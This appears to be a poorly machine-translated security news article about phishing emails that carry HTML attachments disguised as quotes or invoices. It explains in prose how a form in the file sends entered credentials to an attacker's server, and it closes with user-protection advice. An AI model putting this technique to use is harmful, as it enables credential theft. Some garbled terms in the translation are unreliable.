Instead of URLs, phishing emails now use’HTML attachments.’

In light of the recent phishing e-mail trend, South Korean Attacks masquerading as the issuing of quotes and invoices are becoming more common, and in the meantime, elaboration is increasing through stealing the body of an email, the individual in control, the title, and also the email sending account acquired from other networks. It connects to a phishing site through a hyperlink inserted in a URL or image, requests user account information, and attaches the name of an HTML document as a file disguised as’quote’ or’invoice.’ If the technique becomes more popular, it deserves special consideration.

HTML records are used in a variety of e-mail bills, including card balances and carrier fee information. Since the text can be programmed to connect with the server via the Internet, security-related features such as user verification (identification by date of birth, etc.) can be implemented.

Cyber criminals benefit from being able to use the Internet. The details entered by the user in the document can be sent to the server designated by the user without leading the user to a different phishing location.

It is also possible to cheat convincingly, for example, by using a file name like’quote’ and asking for an ID and password for’security’.

Even for the same phishing threat, using HTML documents rather than URLs has benefits. Phishing sites begin with a cyber attacker building a fake site that appears to be identical to the original. We will be led to the website if we click on the URL provided in the document, and the phishing site’s address will appear intact in the web browser.

A cyber thief steals a poorly maintained website and then generates his own phishing page without the administrator’s knowledge in this form of phishing. A savvy person will spot a phishing site by seeing a slightly different address from the one they are familiar with. When a clever intruder uses the’typhos-quoting’ technique, he or she will directly register an Internet address that is close to the original location. If the attack persists, anti-virus software may mark the URL as a malicious site and alert the user when they try to visit it. In conclusion, URL-based phishing attempts are easy to see and are likely to be blocked.

Phishing through HTML documents, on the other hand, is carried out via a web browser, but the file path (the folder on the PC where the HTML document is stored) appears in the address bar rather than the URL. As a result, the user cannot tell whether the user is phishing only by looking at the url, and security tools like vaccines cannot identify the file. Most users believe that since their data is kept locally, they would not be able to link to the Internet (such as C drive).

However, a closer examination of the HTML code reveals that it is set up to deliver the user’s form data (ID/password, etc.) to the URL defined by the attacker. The [form action=”Internet address”] code, for starters, is a tag that determines the server address to which data is sent when particular data is sent. When the code for [type action=”internet address” method=”post”] is combined with the code for [method=”post”], the method of transmitting data is defined, and form data is transmitted to the server previously designated by the intruder. To assume the coding is finished is an understatement.

In other words, if the user enters information here, the perpetrator receives it in its entirety. In reality, the perpetrator hacks a shopping mall site for sterilization goods in another country, then installs his own file storage space on the server and records the victim’s ID/password. The intruder may use the information gathered in this way to carry out a’credential stuffing’ attack, which tries to gain direct access to the corporate groupware service or log in to another service.

Since data is not recorded in the web browser cache (temporary storage file) while it is sent in this manner, it is impossible to ascertain which direction the account information was leaked during a follow-up investigation. Above all, although these phishing files can be generated in a single day of web design training, the scope and threat of such attacks is very wide.

It’s sure to be phishing even though you don’t have the keys. Details can be leaked in a variety of ways depending on how the code is written, and in some situations, not just HTML but also JavaScript is used. As a result, in order to protect phishing emails, users can avoid opening unwanted attachments or clicking unfamiliar URLs. Additionally, you can scan the sender’s name and e-mail address, as well as the contents and signature of the e-mail, to root out suspicious e-mails.